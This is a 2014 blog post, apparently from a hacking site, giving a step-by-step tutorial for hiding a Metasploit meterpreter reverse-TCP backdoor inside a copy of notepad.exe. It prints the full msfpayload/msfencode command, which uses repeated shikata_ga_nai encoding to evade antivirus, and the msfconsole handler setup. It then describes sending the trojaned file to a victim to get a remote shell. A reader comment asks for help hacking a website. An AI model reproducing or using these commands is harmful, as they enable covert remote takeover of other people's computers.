Sunday, 5 January 2014

Create A Backdoor Using Metsploit and Backtrack 5 or Kali Linux in Simple Steps.







How to Create EXE Backdoor Using Metasploit and Backtrack 5,  when you click and open your notepad application it contain backdoor or malicious codes? or when you start your windows Operating System it also start explorer.exe services, but this explorer.exe containing backdoor or malicious codes? Actually embedding backdoor into EXE files isn’t something hard to do, but it’s very easy.. you can follow the tutorial below to prove that I’m true it’s easy.


Requirement:
1:Metasploit Framework 3 or You Can Use Linux OS(Backtrack 5 R3 or Kali Linux).Backtrack 5 R3 and Kali Linux already Include the Metasploit Framework with Latest Version inside The Operating System.

Step by Step to Create a EXE backdoor using Backtrack 5 R3 or Kali Linux. I'm Using Kali Linux To Create A Backdoor.

1. First of all you should Prepare your Target exe file. In case i will use Notepad.exe
2.You can Find notepad.exe from C drive, Windows/system32/notepad.exe.
screen shot shown below

3.Then Copy notpad.exe file in Desktop of Kali Linux.
4.Now Copy this notpad.exe file to the Linux Operating System(Kali Linux).
5.Theb You Need Terminal For Creating backdoor by typing simple Command

 msfpayload windows/meterpreter/reverse_tcp LHOST=[local ip]  LPORT=[local port] R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/notepad1.exe -o /root/Desktop/notepad.exe

Here LHOST is the Local Machine IP of the attacker, LPORT is the  Listening Port of The Attacker.

6. Next We use msfpayload to inject a meterpreter reverse payload into our executable(notepad.exe) and encoded it 5 times (5 iterations) using shikata_ga_nai encode and save the file into Desktop.


7.The Backdoor was Selected Reverse_tcp meterpreter payload, we need to set the exploit handler to handle the connection to back to our attacker machine in case attacker use ip address=192.168.62.130. Goto the Metasploit Console by typing in the terminal "msfconsole".

8.Code written below

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.62.130
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
After exploit command, victim run this notepad.exe file.



9.Meterpreter Session Screenshot.



10.The next step we can send our special NOTEPAD.EXE files to victim, as soon as they download and open it, there’s meterpreter shell on victim computer.

Thank you for reading this post, Please share it to increase us and share knowledge, always feel free to comment and let me know your problems and doubts.

Tags:

1 Responses to “Create A Backdoor Using Metsploit and Backtrack 5 or Kali Linux in Simple Steps.”

Anonymous said...
19 February 2016 at 20:00

Hai, Can you help me in hacking a website??
contact me : Hostweb13@gmail.com


Post a Comment

Subscribe

Enter your E-mail : And Get Daily latest Post Updates in your Inbox.

© 2013 HACK2LINUX. All rights reserved.
Designed by Nik_067